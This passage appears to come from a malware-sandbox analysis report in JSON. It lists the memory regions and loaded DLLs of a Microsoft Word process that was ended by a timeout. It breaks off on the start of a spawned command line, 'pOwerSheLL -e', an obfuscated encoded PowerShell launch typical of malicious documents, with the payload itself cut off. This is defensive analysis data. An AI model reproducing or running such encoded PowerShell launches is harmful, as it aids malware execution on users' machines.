"region_type": "private_memory", "start_va": 39518208, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 39587839, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x00000000025c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39583744, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 39649280, "type": "region", "version": 1 }, "end_va": 39657471, "entry_point": 0, "filename": null, "id": "region_228", "name": "pagefile_0x00000000025d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 39649280, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 41283583, "entry_point": 40763392, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_229", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 40763392, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41615359, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 41615360, "type": "region", "version": 1 }, "end_va": 42663935, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x00000000027b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41615360, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 42860544, "type": "region", "version": 1 }, "end_va": 42926079, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x00000000028e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42860544, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 44040191, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x0000000002900000", "norm_filename": null, "region_type": "private_memory", "start_va": 42991616, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 44040192, "type": "region", "version": 1 }, "end_va": 48234495, "entry_point": 0, "filename": null, "id": "region_234", "name": "pagefile_0x0000000002a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 44040192, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 48234496, "type": "region", "version": 1 }, "end_va": 57868287, "entry_point": 48234496, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_235", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 48234496, "timestamp": "00:00:12.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 58064896, "type": "region", "version": 1 }, "end_va": 59113471, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000003760000", "norm_filename": null, "region_type": "private_memory", "start_va": 58064896, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 59113472, "type": "region", "version": 1 }, "end_va": 59375615, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x0000000003860000", "norm_filename": null, "region_type": "private_memory", "start_va": 59113472, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 59375616, "type": "region", "version": 1 }, "end_va": 60424191, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000038a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 59375616, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 60424192, "type": "region", "version": 1 }, "end_va": 60833791, "entry_point": 60424192, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_239", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 60424192, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 60882944, "type": "region", "version": 1 }, "end_va": 61145087, "entry_point": 0, "filename": null, "id": "region_240", "name": "private_0x0000000003a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 60882944, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 61669376, "type": "region", "version": 1 }, "end_va": 61931519, "entry_point": 0, "filename": null, "id": "region_241", "name": "private_0x0000000003ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 61669376, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 62324736, "type": "region", "version": 1 }, "end_va": 62586879, "entry_point": 0, "filename": null, "id": "region_242", "name": "private_0x0000000003b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 62324736, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62717952, "type": "region", "version": 1 }, "end_va": 62783487, "entry_point": 0, "filename": null, "id": "region_243", "name": "private_0x0000000003bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62717952, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 62783488, "type": "region", "version": 1 }, "end_va": 71172095, "entry_point": 0, "filename": null, "id": "region_244", "name": "pagefile_0x0000000003be0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 62783488, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71368704, "type": "region", "version": 1 }, "end_va": 72417279, "entry_point": 0, "filename": null, "id": "region_245", "name": "private_0x0000000004410000", "norm_filename": null, "region_type": "private_memory", "start_va": 71368704, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 72744960, "type": "region", "version": 1 }, "end_va": 73793535, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x0000000004560000", "norm_filename": null, "region_type": "private_memory", "start_va": 72744960, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 74448896, "type": "region", "version": 1 }, "end_va": 74711039, "entry_point": 0, "filename": null, "id": "region_247", "name": "private_0x0000000004700000", "norm_filename": null, "region_type": "private_memory", "start_va": 74448896, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 75169792, "type": "region", "version": 1 }, "end_va": 76218367, "entry_point": 0, "filename": null, "id": "region_248", "name": "private_0x00000000047b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75169792, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 76218368, "type": "region", "version": 1 }, "end_va": 80412671, "entry_point": 0, "filename": null, "id": "region_249", "name": "pagefile_0x00000000048b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 76218368, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 80412672, "type": "region", "version": 1 }, "end_va": 81199103, "entry_point": 80412672, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_250", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 80412672, "timestamp": "00:00:12.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 81199104, "type": "region", "version": 1 }, "end_va": 85393407, "entry_point": 0, "filename": null, "id": "region_251", "name": "private_0x0000000004d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 81199104, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 85393408, "type": "region", "version": 1 }, "end_va": 87490559, "entry_point": 0, "filename": null, "id": "region_252", "name": "private_0x0000000005170000", "norm_filename": null, "region_type": "private_memory", "start_va": 85393408, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 88211456, "type": "region", "version": 1 }, "end_va": 92405759, "entry_point": 0, "filename": null, "id": "region_253", "name": "private_0x0000000005420000", "norm_filename": null, "region_type": "private_memory", "start_va": 88211456, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 92405760, "type": "region", "version": 1 }, "end_va": 100794367, "entry_point": 0, "filename": null, "id": "region_254", "name": "pagefile_0x0000000005820000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 92405760, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 100794368, "type": "region", "version": 1 }, "end_va": 104992767, "entry_point": 0, "filename": null, "id": "region_255", "name": "private_0x0000000006020000", "norm_filename": null, "region_type": "private_memory", "start_va": 100794368, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 105054208, "type": "region", "version": 1 }, "end_va": 109252607, "entry_point": 0, "filename": null, "id": "region_256", "name": "private_0x0000000006430000", "norm_filename": null, "region_type": "private_memory", "start_va": 105054208, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 109314048, "type": "region", "version": 1 }, "end_va": 113512447, "entry_point": 0, "filename": null, "id": "region_257", "name": "private_0x0000000006840000", "norm_filename": null, "region_type": "private_memory", "start_va": 109314048, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 113573888, "type": "region", "version": 1 }, "end_va": 115671039, "entry_point": 0, "filename": null, "id": "region_258", "name": "private_0x0000000006c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 113573888, "timestamp": "00:00:12.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 115671040, "type": "region", "version": 1 }, "end_va": 120651775, "entry_point": 0, "filename": null, "id": "region_259", "name": "private_0x0000000006e50000", "norm_filename": null, "region_type": "private_memory", "start_va": 115671040, "timestamp": "00:00:12.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 120651776, "type": "region", "version": 1 }, "end_va": 124846079, "entry_point": 0, "filename": null, "id": "region_260", "name": "private_0x0000000007310000", "norm_filename": null, "region_type": "private_memory", "start_va": 120651776, "timestamp": "00:00:12.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 124846080, "type": "region", "version": 1 }, "end_va": 133234687, "entry_point": 0, "filename": null, "id": "region_261", "name": "private_0x0000000007710000", "norm_filename": null, "region_type": "private_memory", "start_va": 124846080, "timestamp": "00:00:12.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 914948096, "type": "region", "version": 1 }, "end_va": 915013631, "entry_point": 0, "filename": null, "id": "region_262", "name": "private_0x0000000036890000", "norm_filename": null, "region_type": "private_memory", "start_va": 914948096, "timestamp": "00:00:12.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1672478720, "type": "region", "version": 1 }, "end_va": 1672663039, "entry_point": 1672478720, "filename": "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_263", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1672478720, "timestamp": "00:00:12.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1630208, "start_va": 1672675328, "type": "region", "version": 1 }, "end_va": 1674305535, "entry_point": 1672675328, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL", "id": "region_264", "name": "riched20.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 1672675328, "timestamp": "00:00:12.535", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 741376, "start_va": 1674313728, "type": "region", "version": 1 }, "end_va": 1675055103, "entry_point": 1674313728, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL", "id": "region_265", "name": "adal.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll", "region_type": "memory_mapped_file", "start_va": 1674313728, "timestamp": "00:00:12.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1675100160, "type": "region", "version": 1 }, "end_va": 1675599871, "entry_point": 1675100160, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_266", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1675100160, "timestamp": "00:00:12.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 1676476416, "type": "region", "version": 1 }, "end_va": 1677565951, "entry_point": 1676476416, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_267", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 1676476416, "timestamp": "00:00:12.575", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 1677590528, "type": "region", "version": 1 }, "end_va": 1678819327, "entry_point": 1677590528, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_268", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 1677590528, "timestamp": "00:00:12.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 80654336, "start_va": 1678835712, "type": "region", "version": 1 }, "end_va": 1759490047, "entry_point": 1678835712, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL", "id": "region_269", "name": "msores.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1678835712, "timestamp": "00:00:12.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 26099712, "start_va": 1759510528, "type": "region", "version": 1 }, "end_va": 1785610239, "entry_point": 1759510528, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL", "id": "region_270", "name": "mso.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll", "region_type": "memory_mapped_file", "start_va": 1759510528, "timestamp": "00:00:12.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 21741568, "start_va": 1785659392, "type": "region", "version": 1 }, "end_va": 1807400959, "entry_point": 1785659392, "filename": "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL", "id": "region_271", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 1785659392, "timestamp": "00:00:12.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1807482880, "type": "region", "version": 1 }, "end_va": 1807785983, "entry_point": 1807482880, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_272", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1807482880, "timestamp": "00:00:12.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1807810560, "type": "region", "version": 1 }, "end_va": 1808347135, "entry_point": 1807810560, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_273", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 1807810560, "timestamp": "00:00:12.657", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1138688, "start_va": 1808400384, "type": "region", "version": 1 }, "end_va": 1809539071, "entry_point": 1808400384, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL", "id": "region_274", "name": "msptls.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 1808400384, "timestamp": "00:00:12.665", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3608576, "start_va": 1809580032, "type": "region", "version": 1 }, "end_va": 1813188607, "entry_point": 1809580032, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL", "id": "region_275", "name": "msointl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1809580032, "timestamp": "00:00:12.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 786432, "start_va": 1813250048, "type": "region", "version": 1 }, "end_va": 1814036479, "entry_point": 1813250048, "filename": "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL", "id": "region_276", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 1813250048, "timestamp": "00:00:12.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 761856, "start_va": 1814036480, "type": "region", "version": 1 }, "end_va": 1814798335, "entry_point": 1814036480, "filename": "\\Windows\\System32\\d2d1.dll", "id": "region_277", "name": "d2d1.dll", "norm_filename": "c:\\windows\\system32\\d2d1.dll", "region_type": "memory_mapped_file", "start_va": 1814036480, "timestamp": "00:00:12.686", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14319616, "start_va": 1814822912, "type": "region", "version": 1 }, "end_va": 1829142527, "entry_point": 1814822912, "filename": "\\Program Files\\Microsoft Office\\Office15\\OART.DLL", "id": "region_278", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\oart.dll", "region_type": "memory_mapped_file", "start_va": 1814822912, "timestamp": "00:00:12.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1859584000, "type": "region", "version": 1 }, "end_va": 1859670015, "entry_point": 1859584000, "filename": "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL", "id": "region_279", "name": "msohev.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\msohev.dll", "region_type": "memory_mapped_file", "start_va": 1859584000, "timestamp": "00:00:12.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1868234752, "type": "region", "version": 1 }, "end_va": 1868566527, "entry_point": 1868234752, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_280", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1868234752, "timestamp": "00:00:12.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1409024, "start_va": 1873281024, "type": "region", "version": 1 }, "end_va": 1874690047, "entry_point": 1873281024, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_281", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 1873281024, "timestamp": "00:00:12.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5242880, "start_va": 1890320384, "type": "region", "version": 1 }, "end_va": 1895563263, "entry_point": 1890320384, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF", "id": "region_282", "name": "office.odf", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 1890320384, "timestamp": "00:00:12.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895563264, "filename": "\\Windows\\System32\\msi.dll", "id": "region_283", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:12.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1898119168, "type": "region", "version": 1 }, "end_va": 1898549247, "entry_point": 1898119168, "filename": "\\Windows\\System32\\msvcp100.dll", "id": "region_284", "name": "msvcp100.dll", "norm_filename": "c:\\windows\\system32\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1898119168, "timestamp": "00:00:12.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1898577920, "type": "region", "version": 1 }, "end_va": 1899360255, "entry_point": 1898577920, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_285", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1898577920, "timestamp": "00:00:12.777", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "pOwerSheLL -e 